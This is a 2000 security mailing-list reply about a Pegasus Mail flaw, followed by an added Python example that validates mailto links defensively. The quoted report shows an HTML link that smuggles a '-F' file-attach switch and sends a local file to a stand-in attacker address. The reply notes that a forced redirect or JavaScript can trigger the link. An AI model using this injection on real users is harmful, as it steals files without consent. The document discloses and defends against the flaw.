Subject: Re: Pegasus Mail
From: Peter Pentchev (roamORBITEL.BG)
Date: Tue Oct 03 2000 - 01:32:10 CDT


On Mon, Oct 02, 2000 at 10:45:26PM +0100, Imran Ghory wrote:
> When using the following html,
>
> <a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
> here</a>
>
> When the user clicks on "Click here" Pegasus mail will
> automatically create a message which has a copy of the file
> "c:\test.txt" and is addressed to "hackerhakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hackerhakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> As in order to have files stolen the user would have to click on the
> dubious looking link, is this security risk serious?

If it is not Pegasus Mail that is parsing the HTML, but some web browser,
which is merely using Pegasus as its mail agent, then yes, it is serious -
many ways have been demonstrated of forcing a user to follow a link.
Refresh with a 0 seconds timeout and JavaScript are the two that come
to mind immediately.

G'luck,
Peter

--
If you think this sentence is confusing, then change one pig.
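
An added example, not part of the original thread and not code from any mail client or browser: one way a browser or `mailto:` handler could validate the link discussed above before passing it to an external mail agent, so that text after the address is never read as a command-line switch. The function names, the `example.test` addresses and the `client_path` argument are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Conservative address pattern (an assumption of this example): no whitespace,
# no quotes, no leading "-", and a domain part is required, so a bare local
# user name is rejected as well.
_ADDR = re.compile(
    r"[A-Za-z0-9_][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
)


def mailto_recipients(url):
    """Return the recipients of a mailto: URL, or raise ValueError.

    Percent-decoding happens before validation, so an encoded space
    (%20) cannot carry an extra token past the check.
    """
    parts = urlsplit(url)
    if parts.scheme != "mailto":
        raise ValueError("not a mailto: URL")
    # Everything before "?" is the recipient list; headers after it are ignored.
    recipients = [r for r in unquote(parts.path).split(",") if r]
    if not recipients:
        raise ValueError("no recipient")
    for r in recipients:
        if not _ADDR.fullmatch(r):
            raise ValueError("rejected recipient: %r" % r)
    return recipients


def handler_argv(client_path, url):
    """Build an argument vector for a hypothetical mail client.

    Each validated recipient is its own argv element. The URL is never
    pasted into a command string that the client would split on spaces.
    """
    return [client_path] + mailto_recipients(url)
```

Passing the returned list to a process-spawning API without a shell keeps the recipient as a single argument even if the validation rules are later loosened.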